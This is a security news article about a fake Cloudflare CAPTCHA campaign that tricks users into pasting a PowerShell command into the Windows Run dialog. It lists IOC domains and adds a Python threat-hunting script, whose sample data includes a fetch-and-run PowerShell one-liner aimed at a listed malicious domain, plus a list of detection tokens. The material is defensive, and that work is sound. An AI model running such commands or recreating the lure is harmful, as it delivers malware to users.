In a new wave of social engineering attacks, cybercriminals are exploiting users' trust in familiar security checks by presenting a convincing fake Cloudflare verification screen.
The attack chain goes beyond traditional phishing: instead of stealing a password, it talks victims into running a malicious command themselves, so the malware is introduced by the user's own hands rather than by a software exploit.
The Attack – Mimicking Security to Breach It
The campaign begins when users land on a malicious webpage, often by clicking on links in phishing emails or malicious ads. Instead of being greeted by the expected website, they see a replica of the familiar Cloudflare “Verify You Are Human” CAPTCHA screen.
The victim, believing it to be a standard security measure, is asked to click the “Verify” button to proceed.
Unbeknownst to the user, clicking the button triggers a multi-stage attack. As soon as the button is pressed:
- Clipboard injection: the page's script silently writes a malicious PowerShell command to the user's clipboard.
- IP address harvesting: at the same time, the victim's IP address is captured and logged by the attacker.
The user is then told to perform an "additional verification step", typically opening the Run dialog with Windows + R and pasting into it.
The page's script watches the keyboard for that key combination (a web page can only observe keystrokes while it has focus, so it infers the dialog was opened from the Windows + R press itself) and, when it sees it, fires a webhook to the attacker's server confirming that the lure is working.
Payload Delivery – Escalating the Breach
If the victim pastes the clipboard contents into the Run dialog as instructed, the chain proceeds:
- Remote command retrieval: the pasted PowerShell command fetches a second, Base64-encoded PowerShell payload from pastesio[.]com; the encoding hides the payload's intent from casual inspection and from simple string-based detection.
- BAT file download and execution: the decoded payload downloads and executes a Windows batch (.BAT) file from axiomsniper[.]info.
Before doing anything else, the BAT file checks for signs of a virtual machine, a common indicator of a sandbox or an analysis machine used by security researchers.
If it finds them, the malware exits quietly, which lowers the chance that automated analysis ever observes its real behaviour. On a real user's machine it proceeds to install secondary payloads, opening the door to data theft, ransomware, or remote control.
Alarmingly, at the time of the research the BAT file was undetected by every engine on VirusTotal, so signature-based antivirus cannot be relied on to stop this stage.
Indicators of Compromise and Mitigation
Key domains involved in the attack include:
- dex-redirect[.]com
- pastesio[.]com
- axiomsniper[.]info
Security researchers recommend heightened vigilance for any unexpected Cloudflare screen that prompts unusual steps, and urge organizations to monitor DNS, proxy and firewall logs for connections to these IOCs.
More generally, no legitimate verification process requires the user to open a Run dialog or paste a command: any "check" that asks for local command execution, PowerShell, or clipboard pasting should be treated as an attack.
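One way to turn the IOCs and the attack chain above into a hunt, as an added example that is not code from the article or from the researchers it cites: it scores process-creation telemetry (Sysmon Event ID 1 / Windows 4688 style fields) for an interpreter spawned by explorer.exe with download-and-run markers or one of the listed domains, and decodes the Explorer RunMRU registry key, which records everything typed into the Run dialog. The field names, token list and all sample data are constructed assumptions; only the three domains come from the page.

```python
"""Hunt for the fake-CAPTCHA / Run-dialog chain in endpoint telemetry.

Added example for this article, not code from the original page or from the
researchers it cites. It runs on constructed sample data that mimics Sysmon
Event ID 1 / Windows 4688 process-creation fields and the Explorer RunMRU
registry values. The IOC domains are the ones the article lists; the field
names, token list and sample command lines are assumptions.
"""

# Domains reported in the article (de-fanged there, plain here for matching).
IOC_DOMAINS = ("dex-redirect.com", "pastesio.com", "axiomsniper.info")

# Fragments typical of a pasted "download and run" PowerShell one-liner.
# Assumed list; tune it to your environment.
SUSPICIOUS_TOKENS = (
    "-enc", "-encodedcommand", "frombase64string", "iex ", "iex(",
    "invoke-expression", "downloadstring", "invoke-webrequest", "iwr ",
    "-w hidden", "-windowstyle hidden",
)

INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")


def score_command(cmd):
    """Return the suspicious tokens and IOC domains found in a command line."""
    low = cmd.lower()
    tokens = [t for t in SUSPICIOUS_TOKENS if t in low]
    domains = [d for d in IOC_DOMAINS if d in low]
    return tokens, domains


def flag_process(rec):
    """Reasons a process-creation record looks like the Run-dialog chain.

    rec: dict with Image, ParentImage, CommandLine (Sysmon EID 1 names).
    Returns [] unless the combined criteria are met, because explorer.exe
    also launches plenty of legitimate scripts.
    """
    image = rec.get("Image", "").lower()
    parent = rec.get("ParentImage", "").lower()
    if not image.endswith(INTERPRETERS):
        return []
    tokens, domains = score_command(rec.get("CommandLine", ""))
    reasons = []
    if domains:
        reasons.append("contacts known IOC domain(s): " + ", ".join(domains))
    # Whatever is typed into Win+R is spawned by the shell, explorer.exe,
    # never by a terminal, a scheduler or an IDE.
    if parent.endswith("explorer.exe") and tokens:
        reasons.append("explorer.exe spawned interpreter with "
                       + ", ".join(repr(t) for t in tokens))
    return reasons


def runmru_entries(values):
    """Decode HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.

    The key stores one value per history slot ('a', 'b', ...) holding
    'command\\1', and MRUList orders the slots most-recent first.
    """
    ordered = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        ordered.append(raw[:-2] if raw.endswith("\\1") else raw)
    return ordered


def flag_runmru(values):
    """Run-dialog history entries that carry download-and-run markers."""
    hits = []
    for cmd in runmru_entries(values):
        tokens, domains = score_command(cmd)
        if tokens or domains:
            hits.append(cmd)
    return hits


# Constructed sample telemetry (not from the article or a real incident).
SAMPLE_PROCESSES = [
    {   # what the pasted one-liner looks like when Win+R launches it
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -c "iex (iwr http://pastesio.com/placeholder)"',
    },
    {   # developer shell: same binary, different parent, no markers
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "CommandLine": "powershell.exe -NoLogo",
    },
    {   # explorer-launched but harmless: no tokens, no IOC
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "cmd /c dir",
    },
]

# Constructed RunMRU values; the Base64 is UTF-16LE "IEX", nothing more.
SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": "powershell -w hidden -enc SQBFAFgA\\1",
}


if __name__ == "__main__":
    for rec in SAMPLE_PROCESSES:
        for reason in flag_process(rec):
            print("ALERT:", rec["CommandLine"], "->", reason)
    for cmd in flag_runmru(SAMPLE_RUNMRU):
        print("RunMRU history contains:", cmd)
```

The parent-process condition matters: the same PowerShell binary launched from a terminal or an editor with the same flags is routine, while an interpreter whose parent is explorer.exe and whose command line fetches and evaluates remote content is exactly what the Run dialog produces in this chain. RunMRU survives a reboot and is worth pulling during triage even when process telemetry was not being collected.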
As attackers continue to innovate, layered security awareness and threat hunting remain crucial defenses against such deceptive threats.